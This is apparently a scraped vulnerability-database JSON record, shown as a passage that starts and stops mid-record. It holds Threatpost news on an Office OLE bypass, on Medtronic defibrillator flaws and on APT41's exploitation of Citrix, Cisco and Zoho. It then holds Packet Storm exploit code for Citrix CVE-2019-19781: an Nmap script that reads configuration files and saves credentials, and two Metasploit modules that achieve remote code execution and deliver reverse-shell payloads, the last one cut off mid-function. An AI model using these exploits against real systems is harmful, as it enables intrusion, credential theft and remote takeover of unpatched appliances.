ignore the section, including any exploit that may be hiding there.\n\n\u201cThis behavior is not documented by Microsoft, but it can confuse high-level parsers, which will not notice the overflow,\u201d Mimecast said.\n\n## In the Wild\n\nMimecast researchers said that they\u2019ve seen several attacks in the last few months that chain together the CVE-2017-11882 exploit with the OLE flaw, which has been successful, they said, in amplifying the attack to make it go undetected.\n\n\u201cOur systems were able to spot an attacker group, which seems to originate from Serbia, using specially crafted Microsoft Word documents\u2026in a way which caused the attacks to circumvent many security solutions designed to protect data from infestation,\u201d Mimecast said. The firm didn\u2019t specify which security solutions they\u2019re referring to.\n\n\u201c[With] this chaining of the older exploit with this integer overflow, Microsoft Office Word mishandles this error. It ignores the higher bytes of the OLE sector ID, loading the malicious object ([CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)) into memory while not following the correct guidelines,\u201d the researchers said.\n\nFarjon told Threatpost that although the newly found issue is being used in the wild, \u201cexploiting this is not an easy task, as it requires deep format understanding.\u201d It\u2019s the difficulty in execution that is likely behind Microsoft\u2019s decision to not immediately patch the problem, he said.\n\n## Microsoft Response\n\nDespite evidence that the flaw is being actively exploited to great effect in the wild, the Microsoft Security Response Center told Mimecast that it will not be fixing OLE with a security patch anytime soon, because the issue by itself does not result in memory corruption and thus doesn\u2019t meet the security bar for an immediate fix.\n\n\u201cWhat Microsoft said is that they won\u2019t be fixing it right now, but perhaps they will on a later undefined date,\u201d Farjon told Threatpost.\n\nHe added, \u201cThey said it is an unintended behavior, but at the same time that it is not important enough to fix right now. Realistically, Microsoft needs to prioritize their work on patches, so their decision makes sense. That being said, it\u2019s up to security professionals to make sure their systems are as up to date as possible and that they are leveraging the threat intelligence they need to better manage today\u2019s evolving threats.\u201d\n\nThe researcher also offered a bottom-line assessment: \u201cAnalyzing all possible outcomes of such flaw is a tough task,\u201d he said. \u201cMimecast worked with the Microsoft Security Response Center and they did analyze all possible outcomes, and came to the conclusion that it didn\u2019t result in memory corruption. So, while it may not be severe, having another tool for attackers to bypass security solutions is not a good thing.\u201d\n\nThreatpost reached out to the computing giant for comments on the findings, and received a short statement: _\u201c_The bug submitted did not meet the severity bar for servicing via a security update,\u201d said a Microsoft spokesperson.\n\n**_Follow all of Threatpost\u2019s RSA Conference 2019 coverage by visiting our [special coverage section](<https://threatpost.com/microsite/rsa-conference-2019-show-coverage/>)._**\n", "modified": "2019-03-05T11:00:03", "published": "2019-03-05T11:00:03", "id": "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "href": "https://threatpost.com/zero-day-exploit-microsoft/142327/", "type": "threatpost", "title": "RSAC 2019: Microsoft Zero-Day Allows Exploits to Sneak Past Sandboxes", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:39:59", "bulletinFamily": "info", "description": "The Department of Homeland Security has issued an emergency alert warning of critical flaws allowing attackers to tamper with several Medtronic medical devices, including defibrillators.\n\nThe two vulnerabilities \u2013 comprised of a medium and critical-severity flaw \u2013 exist in 20 products made by the popular medical device manufacturer, including an array of defibrillators and home patient monitoring systems. An update is not yet available for fixing these flaws, Medtronic told Threatpost.\n\nThe flaws could allow a local attacker to take control of the devices\u2019 functions \u2013 and for a product like an implantable cardioverter defibrillator, which is inserted under the skin and shocks patients\u2019 irregular heartbeats into a normal rhythm, that could have dangerous implications.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe result of successful exploitation of these vulnerabilities may include the ability to read and write any valid memory location on the affected implanted device and therefore impact the intended function of the device,\u201d according to [the DHS alert](<https://ics-cert.us-cert.gov/advisories/ICSMA-19-080-01>).\n\nImpacted products include homecare patient monitors, portable computer system used to program cardiac devices, and several specific Medtronic implanted cardiac devices \u2013 potentially up to 750,000 devices, according to a [report](<http://www.startribune.com/750-000-medtronic-defibrillators-vulnerable-to-hacking/507470932/>) by the Star Tribune.\n\nA Medtronic spokesperson stressed that while defibrillators are impacted, the issue does not affect Medtronic pacemakers or insertable cardiac monitors.\n\n\u201cMedtronic is conducting security checks to look for unauthorized or unusual activity that could be related to these issues,\u201d the spokesperson told Threatpost. \u201cTo date, no cyberattack, privacy breach, or patient harm has been observed or associated with these issues. Medtronic is developing a series of software updates to better secure the wireless communication affected by these issues. The first update is scheduled for later in 2019, subject to regulatory approvals.\u201d\n\n## The Flaws\n\nThe vulnerabilities stem from the Conexus telemetry protocol, which does not implement authentication, authorization or encryption for communication \u2013 allowing an attacker to easily carry out several attacks, such as viewing or altering sensitive data. The Conexus telemetry protocol is used as part of Medtronic\u2019s remote patient management system.\n\nThe vulnerabilities specifically are a critical improper access control vulnerability ([CVE-2019-6538](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6538>)), which has a CVSS score of 9.3 as it only requires a low skill level to exploit; and a cleartext transmission of sensitive information vulnerability ([CVE-2019-6540](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-6540>)) which has a CVSS score of 6.5.\n\n\u201cSuccessful exploitation of these vulnerabilities may allow an attacker with adjacent short-range access to one of the affected products to interfere with, generate, modify, or intercept the radio frequency (RF) communication of the Medtronic proprietary Conexus telemetry system, potentially impacting product functionality and/or allowing access to transmitted sensitive data,\u201d according to the DHS advisory.\n\nThe improper access control stems from the fact that the Conexus telemetry protocol utilized in impacted products does not implement authentication or authorization.\n\n\u201cThis communication protocol provides the ability to read and write memory values to affected implanted cardiac devices; therefore, an attacker could exploit this communication protocol to change memory in the implanted cardiac device,\u201d warned the DHS.\n\nIn order to exploit the vulnerabilities, an attacker would need a radio frequency device capable of transmitting or receiving Conexus telemetry communication (such as a monitor, programmer, or software-defined radio) and would need short-range access to the vulnerable products.\n\n## Updates To Come\n\nMedtronic has applied additional controls for monitoring and responding to improper use of the Conexus telemetry protocol by the affected implanted cardiac devices \u2013 but updates will not be ready until later in 2019.\n\nIn the meantime, \u201cMedtronic and the FDA recommend that patients and physicians continue to use devices and technology as prescribed and intended, as this provides for the most efficient way to manage patients\u2019 devices and heart conditions,\u201d Medtronic said in a statement.\n\nIt\u2019s only the latest set of security issues found in medical manufacturer Medtronic. [In 2018](<https://threatpost.com/remote-code-implantation-flaw-found-in-medtronic-cardiac-programmers/138363/>), a flaw in Medtronic\u2019s CareLink 2090 and CareLink Encore 29901 programmers was discovered allowing remote code implantation over Medtronic\u2019s dedicated Software Deployment Network.\n\nAt Black Hat 2018, researchers stressed that the healthcare device landscape remains insecure and in need of addressing.\n\n\u201c[These attacks] alter how physicians act with patients because they trust technology implicitly,\u201d said Jeff Tully, a pediatrician and anesthesiologist at the University of California Davis at Black Hat.\n\n(Image is licensed under the [Creative Commons](<https://en.wikipedia.org/wiki/en:Creative_Commons> \"w:en:Creative Commons\" ) [Attribution 3.0 Unported](<https://creativecommons.org/licenses/by/3.0/deed.en>) license.)\n", "modified": "2019-03-22T16:07:33", "published": "2019-03-22T16:07:33", "id": "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "href": "https://threatpost.com/medtronic-defibrillators-have-critical-flaws-warns-dhs/143068/", "type": "threatpost", "title": "Medtronic Defibrillators Have Critical Flaws, Warns DHS", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-29T21:52:52", "bulletinFamily": "info", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-03-25T15:57:25", "published": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-01-16T22:49:44", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "PACKETSTORM:155972", "href": "https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html", "title": "Citrix ADC / Gateway Path Traversal", "type": "packetstorm", "sourceData": "`# Exploit Title: Path Traversal in Citrix Application Delivery Controller \n(ADC) and Gateway. \n# Date: 17-12-2019 \n# CVE: CVE-2019-19781 \n# Vulenrability: Path Traversal \n# Vulnerablity Discovery: Mikhail Klyuchnikov \n# Exploit Author: Dhiraj Mishra \n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0 \n# Vendor Homepage: https://www.citrix.com/ \n# References: https://support.citrix.com/article/CTX267027 \n# https://github.com/nmap/nmap/pull/1893 \n \nlocal http = require \"http\" \nlocal stdnse = require \"stdnse\" \nlocal shortport = require \"shortport\" \nlocal table = require \"table\" \nlocal string = require \"string\" \nlocal vulns = require \"vulns\" \nlocal nmap = require \"nmap\" \nlocal io = require \"io\" \n \ndescription = [[ \nThis NSE script checks whether the traget server is vulnerable to \nCVE-2019-19781 \n]] \n--- \n-- @usage \n-- nmap --script https-citrix-path-traversal -p <port> <host> \n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args \noutput='file.txt' \n-- @output \n-- PORT STATE SERVICE \n-- 443/tcp open http \n-- | CVE-2019-19781: \n-- | Host is vulnerable to CVE-2019-19781 \n-- @changelog \n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj) \n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__) \n-- @xmloutput \n-- <table key=\"NMAP-1\"> \n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem> \n-- <elem key=\"state\">VULNERABLE</elem> \n-- <table key=\"description\"> \n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, \n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path \n-- traversal vulnerability that allows attackers to read configurations or \nany other file. \n-- </table> \n-- <table key=\"dates\"> \n-- <table key=\"disclosure\"> \n-- <elem key=\"year\">2019</elem> \n-- <elem key=\"day\">17</elem> \n-- <elem key=\"month\">12</elem> \n-- </table> \n-- </table> \n-- <elem key=\"disclosure\">17-12-2019</elem> \n-- <table key=\"extra_info\"> \n-- </table> \n-- <table key=\"refs\"> \n-- <elem>https://support.citrix.com/article/CTX267027</elem> \n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> \n-- </table> \n-- </table> \n \nauthor = \"Dhiraj Mishra (@RandomDhiraj)\" \nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"discovery\", \"intrusive\",\"vuln\"} \n \nportrule = shortport.ssl \n \naction = function(host,port) \nlocal outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil \nlocal vuln = { \ntitle = 'Citrix ADC Path Traversal', \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, \n12.1, and 13.0 are vulnerable \nto a unauthenticated path traversal vulnerability that allows attackers to \nread configurations or any other file. \n]], \nreferences = { \n'https://support.citrix.com/article/CTX267027', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', \n}, \ndates = { \ndisclosure = {year = '2019', month = '12', day = '17'}, \n}, \n} \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal path = \"/vpn/../vpns/cfg/smb.conf\" \nlocal response \nlocal output = {} \nlocal success = \"Host is vulnerable to CVE-2019-19781\" \nlocal fail = \"Host is not vulnerable\" \nlocal match = \"[global]\" \nlocal credentials \nlocal citrixADC \nresponse = http.get(host, port.number, path) \n \nif not response.status then \nstdnse.print_debug(\"Request Failed\") \nreturn \nend \nif response.status == 200 then \nif string.match(response.body, match) then \nstdnse.print_debug(\"%s: %s GET %s - 200 OK\", \nSCRIPT_NAME,host.targetname or host.ip, path) \nvuln.state = vulns.STATE.VULN \ncitrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname \nor host.ip,port.number, path)) \nif outputFile then \ncredentials = response.body:gsub('%W','.') \nvuln.check_results = stdnse.format_output(true, citrixADC) \nvuln.extra_info = stdnse.format_output(true, \"Credentials are being \nstored in the output file\") \nfile = io.open(outputFile, \"a\") \nfile:write(credentials, \"\\n\") \nelse \nvuln.check_results = stdnse.format_output(true, citrixADC) \nend \nend \nelseif response.status == 403 then \nstdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname \nor host.ip, path, response.status) \nvuln.state = vulns.STATE.NOT_VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155972/cadcg-traversal.nse.txt"}, {"lastseen": "2020-01-14T23:23:57", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-14T00:00:00", "published": "2020-01-14T00:00:00", "id": "PACKETSTORM:155947", "href": "https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "title": "Citrix ADC (NetScaler) Directory Traversal / Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka \nNetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload. \n}, \n'Author' => [ \n'Project Zero India', 'TrustedSec', # PoCs \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module (https://www.pirates.re/) \n], \n'References' => [ \n['CVE', '2019-19781'], \n['EDB', '47901'], \n['EDB', '47902'], \n['URL', 'https://support.citrix.com/article/CTX267027/'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => false, \n'Targets' => [ \n['Python', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON, \n'Type' => :python, \n'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'} \n], \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal', \n'HttpClientTimeout' => 3.5 \n}, \n'Notes' => { \n'AKA' => ['Shitrix'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_unix_generic? \ndatastore['PAYLOAD'] == 'cmd/unix/generic' \nend \n \ndef exploit \nunless datastore['ForceExploit'] \ncase check \nwhen CheckCode::Vulnerable \nprint_good('The target appears to be vulnerable') \nwhen CheckCode::Safe \nfail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable') \nelse \nfail_with(Failure::Unknown, 'The target vulnerability state is unknown') \nend \nend \n \nprint_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \ncase target['Type'] \nwhen :python \nexecute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\")) \nwhen :unix_command \nif (res = execute_command(payload.encoded)) && cmd_unix_generic? \nprint_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, '')) \nend \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nfilename = rand_text_alpha(8..42) \nnonce = rand_text_alpha(8..42) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'), \n'headers' => { \n'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\", \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => rand_text_alpha(8..42), \n'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\" \n} \n) \n \nunless res && res.code == 200 \nprint_error('No response to POST newbm.pl request') \nreturn \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"), \n'headers' => { \n'NSC_USER' => rand_text_alpha(8..42), \n'NSC_NONCE' => nonce \n}, \n'partial' => true \n) \n \nunless res && res.code == 200 \nprint_warning(\"No response to GET #{filename}.xml request\") \nend \n \nregister_files_for_cleanup( \n\"/netscaler/portal/templates/#{filename}.xml\", \n\"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\" \n) \n \nres \nend \n \ndef chr_payload(cmd) \ncmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.') \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155947/citrix_dir_traversal_rce.rb.txt"}, {"lastseen": "2020-01-13T22:40:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "PACKETSTORM:155930", "href": "https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "title": "Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC Remote Code Execution', \n'Description' => %q( \nAn issue was discovered in Citrix Application Delivery Controller (ADC) \nand Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n), \n'Author' => [ \n'RAMELLA S\u00e9bastien' # https://www.pirates.re/ \n], \n'References' => [ \n['CVE', '2019-19781'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], \n['EDB', '47901'], \n['EDB', '47902'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl meterpreter' \n} \n}, \n'Targets' => [ \n['Unix (remote shell)', \n'Type' => :cmd_shell, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (command-line)', \n'Type' => :cmd_generic, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptAddress.new('RHOST', [true, 'The target address']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \n \nderegister_options('RHOSTS') \nend \n \ndef execute_command(command, opts = {}) \nfilename = Rex::Text.rand_text_alpha(16) \nnonce = Rex::Text.rand_text_alpha(6) \n \nrequest = { \n'method' => 'POST', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), \n'headers' => { \n'NSC_USER' => '../../../netscaler/portal/templates/' + filename, \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => 'http://127.0.0.1', \n'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\", \n'desc' => 'desc', \n'UI_inuse' => 'RfWeb' \n}, \n'encode_params' => false \n} \n \nbegin \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \n \nif received.code == 200 \nvprint_status(\"#{received.get_html_document.text}\") \nsleep 2 \n \nrequest = { \n'method' => 'GET', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), \n'headers' => { \n'NSC_USER' => nonce, \n'NSC_NONCE' => nonce \n} \n} \n \n## Trigger to gain exploitation. \nbegin \nsend_request_cgi(request) \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \nreturn received \nend \n \nreturn false \nend \n \ndef get_chr_payload(command) \nchr_payload = command \ni = chr_payload.length \n \noutput = \"\" \nchr_payload.each_char do | c | \ni = i - 1 \noutput << \"chr(\" << c.ord.to_s << \")\" \nif i != 0 \noutput << \" . \" \nend \nend \n \nreturn output \nend \n \ndef check \nbegin \nreceived = send_request_cgi( \n\"method\" => \"GET\", \n\"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') \n) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \n \nif received && received.code != 200 \nreturn Exploit::CheckCode::Safe \nend \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nelse \nprint_good('The target appears to be vulnerable.') \nend \n \ncase target['Type'] \nwhen :cmd_generic \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nreceived = execute_command(payload.encoded) \nif (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\") \nprint_warning('Dumping command output in parsed http response') \nprint_good(\"#{received.get_html_document.text}\") \nelse \nprint_warning('Empty response, no command output') \nreturn \nend \n \nwhen :cmd_shell \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n 